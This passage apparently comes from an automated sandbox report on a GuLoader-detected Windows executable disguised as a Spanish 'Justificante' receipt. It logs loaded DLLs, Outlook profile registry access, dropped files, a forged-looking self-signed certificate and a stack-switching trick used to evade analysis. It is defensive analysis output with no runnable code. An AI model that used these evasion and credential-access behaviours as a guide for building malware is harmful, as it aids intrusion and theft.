            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\Tvejrs.iniJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic file information: File size 1180672 > 1048576
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2049807822.00000000028B7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_6FC41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FC41A98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_6FC42F60 push eax; ret 0_2_6FC42F8E
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02559C30 push esp; retf 0260h4_2_02559D55
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_367F349B push ss; retf 4_2_367F34AE

            Persistence and Installation Behavior

            barindex
            AI detected suspicious PE digital signature
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate where issuer matches subject exactly 2) Organization 'Fejlbehandlingen' is not a known legitimate company 3) Email domain 'Efterhngtes.Dse' appears to be suspicious/non-standard 4) Certificate validation explicitly fails with untrusted root certificate 5) Large time gap between compilation date (July 2021) and certificate creation (Nov 2024) suggests potential certificate manipulation 6) While the country is Germany (DE) which is generally trusted, the combination of an unknown organization with invalid certificate signature is very concerning. The certificate appears crafted to look legitimate but fails basic trust validation.
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile created: C:\Users\user\AppData\Local\Temp\nsd1568.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI/Special instruction interceptor: Address: 2DE681D
